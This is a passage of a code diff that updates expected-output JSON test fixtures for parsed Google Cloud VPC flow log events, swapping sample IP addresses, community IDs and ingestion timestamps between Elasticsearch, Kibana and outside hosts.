"2019-06-14T03:47:10.514594429Z", "end": "2019-06-14T03:47:10.630345069Z", @@ -25168,9 +25168,9 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65277, - "ip": "203.0.113.58" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -25184,7 +25184,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:YSvKG93X/zXgdEB409IbjBJVQFw=", + "community_id": "1:4WmFG6CwXYT/gPzUmmljpbE3pFk=", "bytes": 51612, "transport": "tcp", "type": "ipv4", @@ -25199,7 +25199,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.58" + "67.43.156.13" ] }, "gcp": { @@ -25223,8 +25223,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869322600Z", - "original": "{\"insertId\":\"14iipwlfd8t017\",\"jsonPayload\":{\"bytes_sent\":\"51612\",\"connection\":{\"dest_ip\":\"203.0.113.58\",\"dest_port\":65277,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.316890309Z\",\"packets_sent\":\"615\",\"reporter\":\"SRC\",\"rtt_msec\":\"95\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.760385211Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "ingested": "2021-12-09T13:37:46.392583600Z", + "original": "{\"insertId\":\"14iipwlfd8t017\",\"jsonPayload\":{\"bytes_sent\":\"51612\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65277,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.316890309Z\",\"packets_sent\":\"615\",\"reporter\":\"SRC\",\"rtt_msec\":\"95\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.760385211Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.760385211Z", "end": "2019-06-14T03:49:56.316890309Z", @@ -25253,17 +25253,17 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65272, "bytes": 74330, - "ip": "203.0.113.58", + "ip": "67.43.156.13", "packets": 745 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:Oo7JpkYAgptDkVqBTaGUMnHqiYQ=", + "community_id": "1:AkP1aSEJH9bFKIOkOHf1rOVHNwk=", "bytes": 74330, "transport": "tcp", "type": "ipv4", @@ -25277,7 +25277,7 @@ }, "related": { "ip": [ - "203.0.113.58", + "67.43.156.13", "10.139.99.242" ] }, @@ -25302,8 +25302,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869325200Z", - "original": "{\"insertId\":\"14iipwlfd8t01m\",\"jsonPayload\":{\"bytes_sent\":\"74330\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.58\",\"src_port\":65272},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.316981133Z\",\"packets_sent\":\"745\",\"reporter\":\"DEST\",\"rtt_msec\":\"123\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.403442252Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "ingested": "2021-12-09T13:37:46.392589100Z", + "original": "{\"insertId\":\"14iipwlfd8t01m\",\"jsonPayload\":{\"bytes_sent\":\"74330\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65272},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.316981133Z\",\"packets_sent\":\"745\",\"reporter\":\"DEST\",\"rtt_msec\":\"123\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.403442252Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.403442252Z", "end": "2019-06-14T03:49:56.316981133Z", @@ -25324,9 +25324,9 @@ "as": { "number": 15169 }, - "address": "203.0.113.12", + "address": "67.43.156.13", "port": 59924, - "ip": "203.0.113.12" + "ip": "67.43.156.13" }, "source": { "address": "10.87.40.76", @@ -25340,7 +25340,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:T0Rv8TiMkVLDs+lIQf8LeL2yG4A=", + "community_id": "1:6chxyTuZx655lb71dq3THmRLfyY=", "bytes": 1784, "transport": "tcp", "type": "ipv4", @@ -25355,7 +25355,7 @@ "related": { "ip": [ "10.87.40.76", - "203.0.113.12" + "67.43.156.13" ] }, "gcp": { @@ -25379,8 +25379,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869327900Z", - "original": "{\"insertId\":\"14iipwlfd8t015\",\"jsonPayload\":{\"bytes_sent\":\"1784\",\"connection\":{\"dest_ip\":\"203.0.113.12\",\"dest_port\":59924,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:41:08.213471928Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:41:08.092659117Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "ingested": "2021-12-09T13:37:46.392594600Z", + "original": "{\"insertId\":\"14iipwlfd8t015\",\"jsonPayload\":{\"bytes_sent\":\"1784\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":59924,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:41:08.213471928Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:41:08.092659117Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", "kind": "event", "start": "2019-06-14T03:41:08.092659117Z", "end": "2019-06-14T03:41:08.213471928Z", @@ -25403,9 +25403,9 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65273, - "ip": "203.0.113.58" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -25419,7 +25419,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:12d2Qz5iuI+gHCcFYKHiK+jTFKY=", + "community_id": "1:f+7WLGF1FDb2ZMudfLtDGfB3+gQ=", "bytes": 76622, "transport": "tcp", "type": "ipv4", @@ -25434,7 +25434,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.58" + "67.43.156.13" ] }, "gcp": { @@ -25458,8 +25458,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869330500Z", - "original": "{\"insertId\":\"14iipwlfd8t01h\",\"jsonPayload\":{\"bytes_sent\":\"76622\",\"connection\":{\"dest_ip\":\"203.0.113.58\",\"dest_port\":65273,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.316930467Z\",\"packets_sent\":\"599\",\"reporter\":\"SRC\",\"rtt_msec\":\"115\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.155378287Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "ingested": "2021-12-09T13:37:46.392600100Z", + "original": "{\"insertId\":\"14iipwlfd8t01h\",\"jsonPayload\":{\"bytes_sent\":\"76622\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65273,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.316930467Z\",\"packets_sent\":\"599\",\"reporter\":\"SRC\",\"rtt_msec\":\"115\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.155378287Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.155378287Z", "end": "2019-06-14T03:49:56.316930467Z", @@ -25488,17 +25488,17 @@ "as": { "number": 4847 }, - "address": "192.0.2.73", + "address": "192.168.2.73", "port": 45224, "bytes": 42, - "ip": "192.0.2.73", + "ip": "192.168.2.73", "packets": 5 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:rKlCjiIPAcL1SMVo+HVqssXpCbA=", + "community_id": "1:ppuocaYwNMzpWOs4nDw/orHgE7E=", "bytes": 42, "transport": "tcp", "type": "ipv4", @@ -25512,7 +25512,7 @@ }, "related": { "ip": [ - "192.0.2.73", + "192.168.2.73", "10.73.186.17" ] }, @@ -25537,8 +25537,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869333200Z", - "original": "{\"insertId\":\"14iipwlfd8t019\",\"jsonPayload\":{\"bytes_sent\":\"42\",\"connection\":{\"dest_ip\":\"10.73.186.17\",\"dest_port\":22,\"protocol\":6,\"src_ip\":\"192.0.2.73\",\"src_port\":45224},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"infraops-docker-data\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:42:24.922448897Z\",\"packets_sent\":\"5\",\"reporter\":\"DEST\",\"rtt_msec\":\"242\",\"src_location\":{\"asn\":4847,\"city\":\"Beijing\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Beijing\"},\"start_time\":\"2019-06-14T03:42:23.705320616Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "ingested": "2021-12-09T13:37:46.392605600Z", + "original": "{\"insertId\":\"14iipwlfd8t019\",\"jsonPayload\":{\"bytes_sent\":\"42\",\"connection\":{\"dest_ip\":\"10.73.186.17\",\"dest_port\":22,\"protocol\":6,\"src_ip\":\"192.168.2.73\",\"src_port\":45224},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"infraops-docker-data\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:42:24.922448897Z\",\"packets_sent\":\"5\",\"reporter\":\"DEST\",\"rtt_msec\":\"242\",\"src_location\":{\"asn\":4847,\"city\":\"Beijing\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Beijing\"},\"start_time\":\"2019-06-14T03:42:23.705320616Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", "kind": "event", "start": "2019-06-14T03:42:23.705320616Z", "end": "2019-06-14T03:42:24.922448897Z", @@ -25567,17 +25567,17 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65277, "bytes": 75263, - "ip": "203.0.113.58", + "ip": "67.43.156.13", "packets": 729 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:YSvKG93X/zXgdEB409IbjBJVQFw=", + "community_id": "1:4WmFG6CwXYT/gPzUmmljpbE3pFk=", "bytes": 75263, "transport": "tcp", "type": "ipv4", @@ -25591,7 +25591,7 @@ }, "related": { "ip": [ - "203.0.113.58", + "67.43.156.13", "10.139.99.242" ] }, @@ -25616,8 +25616,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869335900Z", - "original": "{\"insertId\":\"14iipwlfd8t016\",\"jsonPayload\":{\"bytes_sent\":\"75263\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.58\",\"src_port\":65277},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.316890309Z\",\"packets_sent\":\"729\",\"reporter\":\"DEST\",\"rtt_msec\":\"95\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.760385211Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "ingested": "2021-12-09T13:37:46.392611300Z", + "original": "{\"insertId\":\"14iipwlfd8t016\",\"jsonPayload\":{\"bytes_sent\":\"75263\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65277},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.316890309Z\",\"packets_sent\":\"729\",\"reporter\":\"DEST\",\"rtt_msec\":\"95\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.760385211Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.760385211Z", "end": "2019-06-14T03:49:56.316890309Z", @@ -25638,9 +25638,9 @@ "as": { "number": 15169 }, - "address": "198.51.100.107", + "address": "67.43.156.14", "port": 34646, - "ip": "198.51.100.107" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -25654,7 +25654,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:gHx32lWIBcmVoqmKyPEO+iRlC3Q=", + "community_id": "1:8IBpMmKYBYXp/c1Nzms8rg6CQs0=", "bytes": 1780, "transport": "tcp", "type": "ipv4", @@ -25669,7 +25669,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.107" + "67.43.156.14" ] }, "gcp": { @@ -25690,8 +25690,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869338400Z", - "original": "{\"insertId\":\"14iipwlfd8t01c\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"198.51.100.107\",\"dest_port\":34646,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:48:10.529592195Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:48:10.413494375Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "ingested": "2021-12-09T13:37:46.392616800Z", + "original": "{\"insertId\":\"14iipwlfd8t01c\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":34646,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:48:10.529592195Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:48:10.413494375Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", "kind": "event", "start": "2019-06-14T03:48:10.413494375Z", "end": "2019-06-14T03:48:10.529592195Z", @@ -25718,17 +25718,17 @@ "as": { "number": 15169 }, - "address": "198.51.100.107", + "address": "67.43.156.14", "port": 34646, "bytes": 1467, - "ip": "198.51.100.107", + "ip": "67.43.156.14", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:gHx32lWIBcmVoqmKyPEO+iRlC3Q=", + "community_id": "1:8IBpMmKYBYXp/c1Nzms8rg6CQs0=", "bytes": 1467, "transport": "tcp", "type": "ipv4", @@ -25742,7 +25742,7 @@ }, "related": { "ip": [ - "198.51.100.107", + "67.43.156.14", "10.87.40.76" ] }, @@ -25764,8 +25764,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869341200Z", - "original": "{\"insertId\":\"14iipwlfd8t01d\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"198.51.100.107\",\"src_port\":34646},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:48:10.529541195Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:48:10.413397239Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "ingested": "2021-12-09T13:37:46.392622300Z", + "original": "{\"insertId\":\"14iipwlfd8t01d\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":34646},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:48:10.529541195Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:48:10.413397239Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", "kind": "event", "start": "2019-06-14T03:48:10.413397239Z", "end": "2019-06-14T03:48:10.529541195Z", @@ -25792,18 +25792,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33876, "bytes": 5044, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 87 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:dURBkayd+umbcZOJIS7+sTQjLag=", + "community_id": "1:E5NvH5JkoYJgVzpBa96RbCFEXPs=", "bytes": 5044, "name": "default", "transport": "tcp", @@ -25825,7 +25825,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, @@ -25862,8 +25862,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869343700Z", - "original": "{\"insertId\":\"14iipwlfd8t01g\",\"jsonPayload\":{\"bytes_sent\":\"5044\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33876},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.933154111Z\",\"packets_sent\":\"87\",\"reporter\":\"DEST\",\"rtt_msec\":\"34\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466868771Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "ingested": "2021-12-09T13:37:46.392627800Z", + "original": 